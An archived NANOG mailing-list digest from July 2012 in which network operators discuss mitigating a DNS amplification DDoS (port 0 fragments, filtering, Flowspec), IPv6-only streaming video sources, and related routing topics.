rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 06:49:40 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <2EFB4567-C72E-4B4F-96D8-F0EC4C0276E4@arbor.net> On Jul 25, 2012, at 12:08 PM, Jimmy Hess wrote: > The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. I understand all that, thanks. NetFlow reports source/dest port 0 for non-initial fragments. That, coupled with the description of the attack, makes it a near-certainty that the observed attack was a DNS reflection/amplification attack. Furthermore, most routers can't perform the type of filtering necessary to check deeply into the packet header in order to determine if a given packet is a well-formed non-initial fragment or not. And finally, many router implementations interpret source/dest port 0 as - yes, you guessed it - non-initial fragments. Hence, it's not a good idea to filter on source/dest port 0. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From rdobbins at arbor.net Wed Jul 25 01:50:38 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 06:50:38 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <20120725.081320.74666464.sthaug@nethelp.no> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725.081320.74666464.sthaug@nethelp.no> Message-ID: <319BE87A-9E33-4B21-8F3A-6E17A1E3B126@arbor.net> On Jul 25, 2012, at 1:13 PM, wrote: > No, routers normally do *not* reassemble fragments. Absolutely correct. I missed this in the rest of the reply, good catch! ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From jtk at cymru.com Wed Jul 25 09:43:43 2012 From: jtk at cymru.com (John Kristoff) Date: Wed, 25 Jul 2012 09:43:43 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <20120725094343.16f4a397@localhost> On Tue, 24 Jul 2012 23:10:52 -0500 Jimmy Hess wrote: > It should be relatively safe to drop (non-fragment) packets to/from > port 0. [...] Some UDP applications will use zero as a source port when they do not expect a response, which is how many one-way UDP-based apps operate, though not all. This behavior is spelled out in the IETF RFC 768: "Source Port is an optional field, when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted." John From joelja at bogus.com Wed Jul 25 09:51:09 2012 From: joelja at bogus.com (joel jaeggli) Date: Wed, 25 Jul 2012 07:51:09 -0700 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: References: Message-ID: <501007DD.9070702@bogus.com> On 7/18/12 6:24 PM, Andrey Khomyakov wrote: > So some "comments" on the intertubes claim that DoD ok'd use of it's > unadvertized space on private networks. Is there any official reference > that may support this statement that anyone of you have seen out there? The arpanet prefix(10/8) was returned to IANA circa 1990 it's now RFC 1918. everything else is urban myth. > --Andrey > From jmaslak at antelope.net Wed Jul 25 09:52:42 2012 From: jmaslak at antelope.net (Joel Maslak) Date: Wed, 25 Jul 2012 08:52:42 -0600 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <20120725094343.16f4a397@localhost> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost> Message-ID: On Wed, Jul 25, 2012 at 8:43 AM, John Kristoff wrote: > Some UDP applications will use zero as a source port when they do not > expect a response, which is how many one-way UDP-based apps operate, > though not all. This behavior is spelled out in the IETF RFC 768: That would only be applicable if the box was expecting to receive UDP and not send a response. I'm not sure I can think of anything but specialized, vertical applications that would have that behavior with port zero (syslog and SNMP traps send without expecting a response, but they don't use port zero in any implementation I've seen, and neither is generally allowed to be received from the internet at large). In addition to the fragments, these packets might also be non-TCP/UDP (ICMP, GRE, 6to4 and other IP-IP, etc). If the host doesn't expect to receive large UDP packets, you can block UDP fragments. Note that recursive DNS servers would need UDP fragments (well, if you want to do large DNS packets - if you set the right options, you can turn that off). But if you aren't generally providing UDP services, blocking UDP packets, especially to stop an attack, wouldn't hurt (you can also block anything with the MF bit set). If you block these fragments at your provider's router, and it is a DNS amplification attack, you're problems are probably solved until the hacker figures it out. Just make sure you think of things like recursive DNS and other applications that may be using UDP fragments. From frnkblk at iname.com Wed Jul 25 10:27:55 2012 From: frnkblk at iname.com (Frank Bulk) Date: Wed, 25 Jul 2012 10:27:55 -0500 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: <000001cd6a7a$1096b900$31c42b00$@iname.com> Can netflow _properly_ "capture" whether a packet is a fragment or not? If not, does IPFIX address this? Frank -----Original Message----- From: Jimmy Hess [mailto:mysidia at gmail.com] Sent: Wednesday, July 25, 2012 12:08 AM To: Roland Dobbins Cc: Frank Bulk; nanog at nanog.org Subject: Re: DDoS using port 0 and 53 (DNS) On 7/24/12, Roland Dobbins wrote: > Frank Bulk wrote: >>can't exam them for more detail, but wondering if there was some >>collective wisdom about blocking port 0. > Yes - don't do it, or you will break the Internet. These are non-initial Without a packet capture to look at, that's really just a blind assumption. A port number of a non-initial fragment does not exist at all, because the Layer 4 info is unavailable in that case, something _might_ lie and say the port number is 0, but it should not -- there is no TCP header with any port numbers, the only fields available to check against on such packets are Layer 3 fields such as protocol, source, destination address. The port number of the Layer 4 connection cannot be determined without executing IP fragment reassembly in that case. Routers normally reassemble fragments they receive, if possible. An access list statement attempting to match against non-present Layer 4 information, should not work; on a stateful firewall, the presence of the rule might trigger a fragment reassembly, on a router, the non-applicable ACL entry referring to a non-existent port number will generally be ignored. A full capture should not be necessary. You determine if a packet is a fragment by examining the MF flag, bit 50, and fragmentation offset of the IPv4 header; bits 51 through 63. You only need to look at the first 8 bytes of the IP header. If the MF bit is set to 0, and the fragmentation offset is also all bits 0, then the packet is not part of a fragment. The packet is a non-initial fragment if and only if, the fragmentation offset is not set to zero. Port number's not a field you look at for that. -- -JH From rdobbins at arbor.net Wed Jul 25 11:39:13 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 16:39:13 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost> Message-ID: On Jul 25, 2012, at 9:52 PM, Joel Maslak wrote: > In addition to the fragments, these packets might also be non-TCP/UDP (ICMP, GRE, 6to4 and other IP-IP, etc). NetFlow will report the correct protocol number. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From rdobbins at arbor.net Wed Jul 25 11:41:27 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Wed, 25 Jul 2012 16:41:27 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <000001cd6a7a$1096b900$31c42b00$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <000001cd6a7a$1096b900$31c42b00$@iname.com> Message-ID: <06DDAEA5-41C4-431A-811E-B1F391ACF201@arbor.net> On Jul 25, 2012, at 10:27 PM, Frank Bulk wrote: > Can netflow _properly_ "capture" whether a packet is a fragment or not? No. > If not, does IPFIX address this? Yes. But this is all a distraction. We are now down in the weeds. Your customers were victims of a DNS reflection/amplification attack. The issue of fragmentation is moot. The defense methodologies already discussed are how folks typically deal with these attacks. There isn't an ovearching network access policy list you can apply at your edges or ask your peers/upstreams to apply which will mask them - the optimal approach is to deal with them on a case-by-case basis. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From jwbensley at gmail.com Wed Jul 25 11:58:59 2012 From: jwbensley at gmail.com (James Bensley) Date: Wed, 25 Jul 2012 17:58:59 +0100 Subject: Paging Deutsche Telekom Message-ID: Any DTAG engineers on list? We are having a serious problem with them at present. Cheers, James. From da.shi at 3z.ca Wed Jul 25 12:05:44 2012 From: da.shi at 3z.ca (Da Shi) Date: Wed, 25 Jul 2012 13:05:44 -0400 Subject: Paging Deutsche Telekom In-Reply-To: References: Message-ID: <-4605891815588390432@unknownmsgid> noc at telekom.de cip-peer at nmc-m.dtag.de for bgp related On 2012-07-25, at 12:59 PM, James Bensley wrote: > Any DTAG engineers on list? We are having a serious problem with them at > present. > > Cheers, > James. From Tina.Tsou.Zouting at huawei.com Wed Jul 25 12:11:43 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 17:11:43 +0000 Subject: IPv6 only streaming video Message-ID: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> http://video.v6.labs.lacnic.net/jw/ Server can not be found since yesterday. Has the URL been changed? Tina 408-859-4996 From morrowc.lists at gmail.com Wed Jul 25 13:27:03 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 25 Jul 2012 14:27:03 -0400 Subject: IPv6 only streaming video In-Reply-To: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote: > http://video.v6.labs.lacnic.net/jw/ > Server can not be found since yesterday. Has the URL been changed? > > did you mean to email the lacnic folks? From Tina.Tsou.Zouting at huawei.com Wed Jul 25 13:37:42 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 18:37:42 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. I just could not find his contact in my mailbox. So I hope he can find me again. Does the link accessible from your IPv6 host? Tina @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > -----Original Message----- > From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] > On Behalf Of Christopher Morrow > Sent: Wednesday, July 25, 2012 11:27 AM > To: Tina TSOU > Cc: nanog at nanog.org > Subject: Re: IPv6 only streaming video > > On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU > wrote: > > http://video.v6.labs.lacnic.net/jw/ > > Server can not be found since yesterday. Has the URL been changed? > > > > > > did you mean to email the lacnic folks? From aservin at lacnic.net Wed Jul 25 13:58:12 2012 From: aservin at lacnic.net (Arturo Servin) Date: Wed, 25 Jul 2012 15:58:12 -0300 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: Oh! We had it as a test service. We didn't know that it was been used by more people, so probably somebody turn it off. I will look around to restart it. Thanks! as On 25 Jul 2012, at 15:37, Tina TSOU wrote: > We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. > I just could not find his contact in my mailbox. So I hope he can find me again. > Does the link accessible from your IPv6 host? > > Tina > @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > >> -----Original Message----- >> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] >> On Behalf Of Christopher Morrow >> Sent: Wednesday, July 25, 2012 11:27 AM >> To: Tina TSOU >> Cc: nanog at nanog.org >> Subject: Re: IPv6 only streaming video >> >> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >> wrote: >>> http://video.v6.labs.lacnic.net/jw/ >>> Server can not be found since yesterday. Has the URL been changed? >>> >>> >> >> did you mean to email the lacnic folks? -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/pkcs7-signature Size: 2330 bytes Desc: not available URL: From aservin at lacnic.net Wed Jul 25 14:14:05 2012 From: aservin at lacnic.net (Arturo Servin) Date: Wed, 25 Jul 2012 16:14:05 -0300 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> Message-ID: <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> The licence expired. We will see if we can get another one. Cheers, as On 25 Jul 2012, at 15:58, Arturo Servin wrote: > > Oh! > > We had it as a test service. We didn't know that it was been used by more people, so probably somebody turn it off. > > I will look around to restart it. > > Thanks! > as > > On 25 Jul 2012, at 15:37, Tina TSOU wrote: > >> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network. >> I just could not find his contact in my mailbox. So I hope he can find me again. >> Does the link accessible from your IPv6 host? >> >> Tina >> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >> >>> -----Original Message----- >>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] >>> On Behalf Of Christopher Morrow >>> Sent: Wednesday, July 25, 2012 11:27 AM >>> To: Tina TSOU >>> Cc: nanog at nanog.org >>> Subject: Re: IPv6 only streaming video >>> >>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>> wrote: >>>> http://video.v6.labs.lacnic.net/jw/ >>>> Server can not be found since yesterday. Has the URL been changed? >>>> >>>> >>> >>> did you mean to email the lacnic folks? > From Tina.Tsou.Zouting at huawei.com Wed Jul 25 15:15:35 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 20:15:35 +0000 Subject: IPv6 only streaming video In-Reply-To: <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: Dear all, If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. Thank you. Tina > -----Original Message----- > From: Arturo Servin [mailto:aservin at lacnic.net] > Sent: Wednesday, July 25, 2012 12:14 PM > To: Tina TSOU > Cc: nanog at nanog.org > Subject: Re: IPv6 only streaming video > > > The licence expired. > > We will see if we can get another one. > > Cheers, > as > > On 25 Jul 2012, at 15:58, Arturo Servin wrote: > > > > > Oh! > > > > We had it as a test service. We didn't know that it was been used > by more people, so probably somebody turn it off. > > > > I will look around to restart it. > > > > Thanks! > > as > > > > On 25 Jul 2012, at 15:37, Tina TSOU wrote: > > > >> We got offline after discussion in NANOG in May. This IPv6 only > streaming video worked well until recently. We use it in my enterprise > network. > >> I just could not find his contact in my mailbox. So I hope he can > find me again. > >> Does the link accessible from your IPv6 host? > >> > >> Tina > >> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e > >> > >>> -----Original Message----- > >>> From: christopher.morrow at gmail.com > [mailto:christopher.morrow at gmail.com] > >>> On Behalf Of Christopher Morrow > >>> Sent: Wednesday, July 25, 2012 11:27 AM > >>> To: Tina TSOU > >>> Cc: nanog at nanog.org > >>> Subject: Re: IPv6 only streaming video > >>> > >>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU > >>> wrote: > >>>> http://video.v6.labs.lacnic.net/jw/ > >>>> Server can not be found since yesterday. Has the URL been changed? > >>>> > >>>> > >>> > >>> did you mean to email the lacnic folks? > > From morrowc.lists at gmail.com Wed Jul 25 15:48:57 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 25 Jul 2012 16:48:57 -0400 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU wrote: > Dear all, > If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. > Thank you. youtube will stream at you over ipv6 ... did you just need some thing to stream at you over ipv6? I think you can even (if you do the 'i have cable/etc' dance) stream the olympics from nbc over v6 these days. From Tina.Tsou.Zouting at huawei.com Wed Jul 25 16:09:43 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Wed, 25 Jul 2012 21:09:43 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: My enterprise users need to turn off IPv4 on their hosts to experience YouTube IPv6 only streaming video. Courtesy to Owen. It is an enterprise network here, I can't dictate for everyone. Some people prefer dual stack host, some people prefer IPv6 only host. Youtube works in our IPv6 only host and dual stack host. Ipv6.netflix.com doesn't seem to work in our dual stack host and IPv6 only host. Do you have the URL of IPv6 only stream video about the Olympics from nbc? Tina > -----Original Message----- > From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] > On Behalf Of Christopher Morrow > Sent: Wednesday, July 25, 2012 1:49 PM > To: Tina TSOU > Cc: Arturo Servin; nanog at nanog.org > Subject: Re: IPv6 only streaming video > > On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU > wrote: > > Dear all, > > If you know there is any testing or commercial IPv6 only streaming > video we can access, let me know. > > Thank you. > > youtube will stream at you over ipv6 ... did you just need some thing > to stream at you over ipv6? > I think you can even (if you do the 'i have cable/etc' dance) stream > the olympics from nbc over v6 these days. From drew.weaver at thenap.com Wed Jul 25 17:13:52 2012 From: drew.weaver at thenap.com (Drew Weaver) Date: Wed, 25 Jul 2012 18:13:52 -0400 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: <003101cd6a17$3f81ddc0$be859940$@iname.com> References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: Another nice "emerging" tool [I say emerging because it's been around forever but nobody implements it] to deal with this is Flowspec, using flowspec you can instruct your Upstream to block traffic with much more granular characteristics. Instead of dropping all traffic to the IP address, you can drop (for example) udp dst 80 traffic to the IP address, or traffic from a particular source to a particular DST. It can also be initiated by your side without interaction from the upstream ISP. Just saying =) -Drew -----Original Message----- From: Frank Bulk [mailto:frnkblk at iname.com] Sent: Tuesday, July 24, 2012 11:41 PM To: nanog at nanog.org Subject: DDoS using port 0 and 53 (DNS) Several times this year our customers have suffered DDoS' ranging from 30 Mbps to over 1 Gbps, sometimes sustained, sometimes in a several minute spurts. They are targeted at one IP address, and most times our netflow tool identifies that a large percentage of the traffic is "port 0". The one from today had about 89% port 0 and 11% port 53 (DNS). If it happens repeatedly or continuously we just have our upstream provider blackhole the target (victim) IP address. I've been tempted to ask our upstream provider to block all traffic to us that's targeted to tcp or udp port 0 -- is that safe to do? I found two NANOG archives that talk about this http://www.nanog.org/mailinglist/mailarchives/old_archive/2005-04/msg00091.h tml http://www.gossamer-threads.com/lists/nanog/users/18990 and the first suggests that port zero could really be fragmented packets. Unfortunately I don't have packet captures of any of the attacks, so I can't exam them for more detail, but wondering if there was some collective wisdom about blocking port 0. Regards, Frank From marka at isc.org Wed Jul 25 18:19:41 2012 From: marka at isc.org (Mark Andrews) Date: Thu, 26 Jul 2012 09:19:41 +1000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: Your message of "Wed, 25 Jul 2012 08:52:42 CST." References: <003101cd6a17$3f81ddc0$be859940$@iname.com> <20120725094343.16f4a397@localhost> Message-ID: <20120725231941.4AF2122FFE41@drugs.dv.isc.org> In message , Joel Maslak writes: > On Wed, Jul 25, 2012 at 8:43 AM, John Kristoff wrote: > > > Some UDP applications will use zero as a source port when they do not > > expect a response, which is how many one-way UDP-based apps operate, > > though not all. This behavior is spelled out in the IETF RFC 768: > > That would only be applicable if the box was expecting to receive UDP > and not send a response. I'm not sure I can think of anything but > specialized, vertical applications that would have that behavior with > port zero (syslog and SNMP traps send without expecting a response, > but they don't use port zero in any implementation I've seen, and > neither is generally allowed to be received from the internet at > large). > > In addition to the fragments, these packets might also be non-TCP/UDP > (ICMP, GRE, 6to4 and other IP-IP, etc). If the host doesn't expect to > receive large UDP packets, you can block UDP fragments. Note that > recursive DNS servers would need UDP fragments (well, if you want to > do large DNS packets - if you set the right options, you can turn that > off). But if you aren't generally providing UDP services, blocking > UDP packets, especially to stop an attack, wouldn't hurt (you can also > block anything with the MF bit set). If you block these fragments at > your provider's router, and it is a DNS amplification attack, you're > problems are probably solved until the hacker figures it out. Just > make sure you think of things like recursive DNS and other > applications that may be using UDP fragments. Actually *all* IPv6 node are supposed to support EDNS so *all* IPv6 hosts should be expecting to receive fragmented UDP for DNS. Add to that all hosts that do DNSSEC validation in the stub resolver / application. With DANE this will be any host with a web browser. Mark -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From randy at psg.com Wed Jul 25 19:20:08 2012 From: randy at psg.com (Randy Bush) Date: Wed, 25 Jul 2012 17:20:08 -0700 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: > My enterprise users it is generally best if vendors do not speak for users and vice versa randy From morrowc.lists at gmail.com Wed Jul 25 20:34:02 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 25 Jul 2012 21:34:02 -0400 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: On Wed, Jul 25, 2012 at 5:09 PM, Tina TSOU wrote: > My enterprise users need to turn off IPv4 on their hosts to experience YouTube IPv6 only streaming video. Courtesy to Owen. I think if you have a dual-stack host you'll just get the v6 version of stream... I suppose there are happy-eyeball cases where v4 may win the race though? Is that what you're seeing in this case? (do the hosts even attempt a AAAA lookup, and a subsequent connect to the v6 address, presuming a AAAA was returned to them) > It is an enterprise network here, I can't dictate for everyone. Some people prefer dual stack host, some people prefer IPv6 only host. > Youtube works in our IPv6 only host and dual stack host. ok, so... win? > Ipv6.netflix.com doesn't seem to work in our dual stack host and IPv6 only host. > Do you have the URL of IPv6 only stream video about the Olympics from nbc? > nbc looks to be using youtube for the streams, so ... any one of their streams should go over v6 (or v4). This one isn't olympics related, but streamed over v6 to me... > Tina > > >> -----Original Message----- >> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com] >> On Behalf Of Christopher Morrow >> Sent: Wednesday, July 25, 2012 1:49 PM >> To: Tina TSOU >> Cc: Arturo Servin; nanog at nanog.org >> Subject: Re: IPv6 only streaming video >> >> On Wed, Jul 25, 2012 at 4:15 PM, Tina TSOU >> wrote: >> > Dear all, >> > If you know there is any testing or commercial IPv6 only streaming >> video we can access, let me know. >> > Thank you. >> >> youtube will stream at you over ipv6 ... did you just need some thing >> to stream at you over ipv6? >> I think you can even (if you do the 'i have cable/etc' dance) stream >> the olympics from nbc over v6 these days. From gih at apnic.net Wed Jul 25 21:16:50 2012 From: gih at apnic.net (Geoff Huston) Date: Thu, 26 Jul 2012 12:16:50 +1000 Subject: Weekly Routing Table Report In-Reply-To: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net> Message-ID: On 21/07/2012, at 6:40 AM, Jared Mauch wrote: > > On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote: > >> >> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote: >>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said: >>>> BGP routing table entries examined: 418048 >>> So, whatever happened to that whole "the internet will catch fire when >>> we get to 280K routing table entries" or whatever it was? :) >> >> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes. > > I think you mean 512k IPv4 with 256k of IPv6 (taking double space). 512K of IPv4? That's getting close! Geoff From Tina.Tsou.Zouting at huawei.com Wed Jul 25 22:25:38 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Thu, 26 Jul 2012 03:25:38 +0000 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , Message-ID: <6FA3E5FF-AC62-432D-95B7-7A4E57A879DC@huawei.com> Dear Randy, I'm responsible for IPv6 deployment in my enterprise network, the users are my colleagues. In this context, I'm not vendor, not operator. Tina On Jul 25, 2012, at 5:20 PM, "Randy Bush" wrote: >> My enterprise users > > it is generally best if vendors do not speak for users and vice versa > > randy From joelja at bogus.com Wed Jul 25 22:47:44 2012 From: joelja at bogus.com (Joel jaeggli) Date: Wed, 25 Jul 2012 20:47:44 -0700 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> Message-ID: <5010BDE0.8070406@bogus.com> On 7/25/12 13:15 , Tina TSOU wrote: > Dear all, > If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. > Thank you. speaking as a content provider, ipv6-only service requests are misguided. > Tina > > >> -----Original Message----- >> From: Arturo Servin [mailto:aservin at lacnic.net] >> Sent: Wednesday, July 25, 2012 12:14 PM >> To: Tina TSOU >> Cc: nanog at nanog.org >> Subject: Re: IPv6 only streaming video >> >> >> The licence expired. >> >> We will see if we can get another one. >> >> Cheers, >> as >> >> On 25 Jul 2012, at 15:58, Arturo Servin wrote: >> >>> >>> Oh! >>> >>> We had it as a test service. We didn't know that it was been used >> by more people, so probably somebody turn it off. >>> >>> I will look around to restart it. >>> >>> Thanks! >>> as >>> >>> On 25 Jul 2012, at 15:37, Tina TSOU wrote: >>> >>>> We got offline after discussion in NANOG in May. This IPv6 only >> streaming video worked well until recently. We use it in my enterprise >> network. >>>> I just could not find his contact in my mailbox. So I hope he can >> find me again. >>>> Does the link accessible from your IPv6 host? >>>> >>>> Tina >>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >>>> >>>>> -----Original Message----- >>>>> From: christopher.morrow at gmail.com >> [mailto:christopher.morrow at gmail.com] >>>>> On Behalf Of Christopher Morrow >>>>> Sent: Wednesday, July 25, 2012 11:27 AM >>>>> To: Tina TSOU >>>>> Cc: nanog at nanog.org >>>>> Subject: Re: IPv6 only streaming video >>>>> >>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>>>> wrote: >>>>>> http://video.v6.labs.lacnic.net/jw/ >>>>>> Server can not be found since yesterday. Has the URL been changed? >>>>>> >>>>>> >>>>> >>>>> did you mean to email the lacnic folks? >>> > > > From rdobbins at arbor.net Wed Jul 25 23:03:01 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Thu, 26 Jul 2012 04:03:01 +0000 Subject: DDoS using port 0 and 53 (DNS) In-Reply-To: References: <003101cd6a17$3f81ddc0$be859940$@iname.com> Message-ID: On Jul 26, 2012, at 5:13 AM, Drew Weaver wrote: > Another nice "emerging" tool [I say emerging because it's been around forever but nobody implements it] to deal with this is Flowspec, using flowspec you can instruct your Upstream to block traffic with much more granular characteristics. flowspec is essentially S/RTBH with layer-4 granularity (it can do some other things, as well). I certainly hope that vendors who've not yet implemented it will do so, it's a great tool, as you say. Even customer-triggered S/RTBH is very useful, and some ISPs have implemented it for their customers. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From rdobbins at arbor.net Wed Jul 25 23:19:27 2012 From: rdobbins at arbor.net (Dobbins, Roland) Date: Thu, 26 Jul 2012 04:19:27 +0000 Subject: Another LTE network turns up as IPv4-only squat space + NAT In-Reply-To: <20120719085002.GI20473@besserwisser.org> References: <009801cd6557$503c6d70$f0b54850$@gmail.com> <20120719085002.GI20473@besserwisser.org> Message-ID: <9D5876CA-0D09-43A5-B105-6EB5DCFDEBF5@arbor.net> On Jul 19, 2012, at 3:50 PM, M?ns Nilsson wrote: > No, reusing somebody's prefix is A Very Bad Idea. Concur 100%. There is no security value to doing this whatsoever - quite the opposite, given the possible negative consequences to reachability and, thus, availability. ----------------------------------------------------------------------- Roland Dobbins // Luck is the residue of opportunity and design. -- John Milton From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:43:20 2012 From: Tina.Tsou.Zouting at huawei.com (Tina TSOU) Date: Thu, 26 Jul 2012 04:43:20 +0000 Subject: IPv6 only streaming video In-Reply-To: <5010BDE0.8070406@bogus.com> References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , <5010BDE0.8070406@bogus.com> Message-ID: <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com> Dear Joel, Who requests IPv6 only service? Tina On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" wrote: > On 7/25/12 13:15 , Tina TSOU wrote: >> Dear all, >> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know. >> Thank you. > > speaking as a content provider, ipv6-only service requests are misguided. > >> Tina >> >> >>> -----Original Message----- >>> From: Arturo Servin [mailto:aservin at lacnic.net] >>> Sent: Wednesday, July 25, 2012 12:14 PM >>> To: Tina TSOU >>> Cc: nanog at nanog.org >>> Subject: Re: IPv6 only streaming video >>> >>> >>> The licence expired. >>> >>> We will see if we can get another one. >>> >>> Cheers, >>> as >>> >>> On 25 Jul 2012, at 15:58, Arturo Servin wrote: >>> >>>> >>>> Oh! >>>> >>>> We had it as a test service. We didn't know that it was been used >>> by more people, so probably somebody turn it off. >>>> >>>> I will look around to restart it. >>>> >>>> Thanks! >>>> as >>>> >>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote: >>>> >>>>> We got offline after discussion in NANOG in May. This IPv6 only >>> streaming video worked well until recently. We use it in my enterprise >>> network. >>>>> I just could not find his contact in my mailbox. So I hope he can >>> find me again. >>>>> Does the link accessible from your IPv6 host? >>>>> >>>>> Tina >>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >>>>> >>>>>> -----Original Message----- >>>>>> From: christopher.morrow at gmail.com >>> [mailto:christopher.morrow at 